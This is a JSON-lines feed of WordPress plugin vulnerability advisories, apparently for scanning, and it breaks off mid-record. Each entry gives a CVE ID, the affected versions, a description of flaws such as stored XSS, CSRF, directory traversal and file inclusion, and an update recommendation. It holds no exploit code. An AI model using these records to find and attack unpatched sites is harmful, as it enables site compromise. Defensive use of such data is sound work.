{"CVE_ID":"CVE-2024-5571","slug":"embedpress","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's EmbedPress PDF widget in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7becdab6-f952-4649-8cea-4efadf841619?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7becdab6-f952-4649-8cea-4efadf841619?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/4.0.0\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L690\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/4.0.0\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Pdf.php#L690\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097114\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097114\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5684","slug":"metform","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The MetForm \u2013 Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `mf-template` DOM Element in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/tags\\\/3.9.9\\\/public\\\/assets\\\/js\\\/app.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/tags\\\/3.9.9\\\/public\\\/assets\\\/js\\\/app.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dded505-8968-4ed2-8883-42a3ec50155c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dded505-8968-4ed2-8883-42a3ec50155c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13704","slug":"super-testimonial","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'st_user_title' parameter in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240039%40super-testimonial&new=3240039%40super-testimonial&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240039%40super-testimonial&new=3240039%40super-testimonial&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20720912-6bfd-4df1-97c7-7025c16d7a0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20720912-6bfd-4df1-97c7-7025c16d7a0f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0255","slug":"enable-media-replace","versionEndExcluding":"4.0.2","description":"The Enable Media Replace WordPress plugin before 4.0.2 does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0239208-1e23-4774-9b8c-9611704a07a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0239208-1e23-4774-9b8c-9611704a07a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5505","slug":"backwpup","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The BackWPup plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.0.1 via the job-specific backup folder. This allows authenticated attackers to store backups in arbitrary folders on the server provided they can be written to by the server. Additionally, default settings will place an index.php and a .htaccess file into the chosen directory (unless already present) when the first backup job is run that are intended to prevent directory listing and file access. This means that an attacker could set the backup directory to the root of another site in a shared environment and thus disable that site.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98085a23-0cb6-442a-a28a-cb5c2890b60d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98085a23-0cb6-442a-a28a-cb5c2890b60d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-editjob.php?rev=2818974#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-editjob.php?rev=2818974#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980789%40backwpup%2Ftrunk&old=2954541%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980789%40backwpup%2Ftrunk&old=2954541%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000176\\\/backwpup\\\/trunk\\\/inc\\\/class-destination-folder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000176\\\/backwpup\\\/trunk\\\/inc\\\/class-destination-folder.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000176%40backwpup&new=3000176%40backwpup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000176%40backwpup&new=3000176%40backwpup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7423","slug":"stream","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The Stream plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.0.1. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can lead to DoS or privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d15e418-36bb-4f53-ac67-8f6122591dd2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d15e418-36bb-4f53-ac67-8f6122591dd2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stream\\\/tags\\\/4.0.1\\\/classes\\\/class-network.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stream\\\/tags\\\/4.0.1\\\/classes\\\/class-network.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139815\\\/stream\\\/trunk\\\/classes\\\/class-network.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139815\\\/stream\\\/trunk\\\/classes\\\/class-network.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5504","slug":"backwpup","versionImpact":"4.0.1","versionEndExcluding":"4.0.2","description":"The BackWPup plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.0.1 via the Log File Folder. This allows authenticated attackers to store backups in arbitrary folders on the server provided they can be written to by the server. Additionally, default settings will place an index.php and a .htaccess file into the chosen directory (unless already present) when the first backup job is run that are intended to prevent directory listing and file access. This means that an attacker could set the backup directory to the root of another site in a shared environment and thus disable that site.","recommendation":"Update to version 4.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e830fe1e-1171-46da-8ee7-0a6654153f18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e830fe1e-1171-46da-8ee7-0a6654153f18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-settings.php?rev=2818974#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backwpup\\\/trunk\\\/inc\\\/class-page-settings.php?rev=2818974#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000176%40backwpup%2Ftrunk&old=2980789%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000176%40backwpup%2Ftrunk&old=2980789%40backwpup%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1110","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.0.11","versionEndExcluding":"4.0.12","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init() function in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to import the plugin's settings.","recommendation":"Update to version 4.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/7873ff520631087e2f10737860cdcd64d53187ba\",\"name\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/7873ff520631087e2f10737860cdcd64d53187ba\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1109","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.0.11","versionEndExcluding":"4.0.12","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information.","recommendation":"Update to version 4.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/0ac83d1955aa964a358833b1b5ce790fff45b3f4\",\"name\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-publisher\\\/commit\\\/0ac83d1955aa964a358833b1b5ce790fff45b3f4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5467","slug":"geo-my-wp","versionImpact":"4.0","versionEndExcluding":"4.0.1","description":"The GEO my WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0.1\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0.1\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L413\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a96ac71f-3dae-40eb-9268-d56688a5aa64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a96ac71f-3dae-40eb-9268-d56688a5aa64?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-my-wp\\\/tags\\\/4.0\\\/plugins\\\/single-location\\\/includes\\\/class-gmw-single-location.php#L401\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5539","slug":"wp-easy-contact","versionImpact":"4.0.0","versionEndExcluding":"4.0.1","description":"The Simple Contact Form Plugin for WordPress \u2013 WP Easy Contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 4.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3296825%40wp-easy-contact&new=3296825%40wp-easy-contact&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3296825%40wp-easy-contact&new=3296825%40wp-easy-contact&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f584a439-3373-441c-a73e-5931ae63e7ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f584a439-3373-441c-a73e-5931ae63e7ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1764","slug":"loginpress","versionImpact":"3.3.1","versionEndExcluding":"4.0.0","description":"The LoginPress | wp-login Custom Login Page Customizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.1. This is due to missing or incorrect nonce validation on the 'custom_plugin_set_option' function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. The 'WPBRIGADE_SDK__DEV_MODE' constant must be set to 'true' to exploit the vulnerability.","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/loginpress\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/loginpress\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253283\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pt.wordpress.org\\\/plugins\\\/loginpress\\\/\",\"name\":\"https:\\\/\\\/pt.wordpress.org\\\/plugins\\\/loginpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df6a2b4-2dc4-43dd-8282-5c05b0fa13f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df6a2b4-2dc4-43dd-8282-5c05b0fa13f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3288","slug":"logo-slider-wp","versionImpact":"3.9.9","versionEndExcluding":"4.0.0","description":"The Logo Slider  WordPress plugin before 4.0.0 does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ef99f54-68df-4353-8fc0-9b09ac0df7ba\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ef99f54-68df-4353-8fc0-9b09ac0df7ba\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5892","slug":"addons-for-divi","versionImpact":"3.6.6","versionEndExcluding":"4.0.0","description":"The Divi Torque Lite \u2013 Divi Theme and Extra Theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018support_unfiltered_files_upload\u2019 function in all versions up to, and including, 3.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78dae5be-a71b-45bc-8814-7cc86233ae90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78dae5be-a71b-45bc-8814-7cc86233ae90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/tags\\\/3.6.6\\\/includes\\\/extensions\\\/unfiltered-file-uploads\\\/ext-unfiltered-file-uploads.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/tags\\\/3.6.6\\\/includes\\\/extensions\\\/unfiltered-file-uploads\\\/ext-unfiltered-file-uploads.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088441%40addons-for-divi%2Ftags%2F4.0.0&old=3001416%40addons-for-divi%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088441%40addons-for-divi%2Ftags%2F4.0.0&old=3001416%40addons-for-divi%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11826","slug":"quillforms","versionImpact":"3.10.0","versionEndExcluding":"4.0.0","description":"The Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quillforms-popup' shortcode in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214019\\\/quillforms\\\/trunk\\\/includes\\\/class-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214019\\\/quillforms\\\/trunk\\\/includes\\\/class-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59a4d69-cf51-44c1-90bf-19be04774c27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59a4d69-cf51-44c1-90bf-19be04774c27?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4714","slug":"wp-dark-mode","versionEndExcluding":"4.0.0","description":"The WP Dark Mode WordPress plugin before 4.0.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61b475f1-bbfb-4450-a3b2-b8caf5df2340\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61b475f1-bbfb-4450-a3b2-b8caf5df2340\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3139","slug":"protect-wp-admin","versionEndExcluding":"4.0","description":"The Protect WP Admin WordPress plugin before 4.0 discloses the URL of the admin panel via a redirection of a crafted URL, bypassing the protection offered.","refs":"[{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-3139.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-3139.txt\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f8a29aee-19cd-4e62-b829-afc9107f69bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f8a29aee-19cd-4e62-b829-afc9107f69bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3849","slug":"click-to-chat-for-whatsapp","versionImpact":"3.35","versionEndExcluding":"4.0","description":"The Click to Chat \u2013 HoliThemes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.35. This makes it possible for authenticated attackers, with contributor access or above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe25bfef-34f0-4d57-9cba-9dcbf58281c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe25bfef-34f0-4d57-9cba-9dcbf58281c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/tools\\\/woo\\\/class-ht-ctc-woo.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/tools\\\/woo\\\/class-ht-ctc-woo.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/admin\\\/admin_demo\\\/class-ht-ctc-admin-demo.php#L280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/admin\\\/admin_demo\\\/class-ht-ctc-admin-demo.php#L280\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat-shortcode.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat-shortcode.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group-shortcode.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group-shortcode.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share-shortcode.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share-shortcode.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/class-ccw-shortcode.php#L277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/class-ccw-shortcode.php#L277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/commons\\\/styles.ph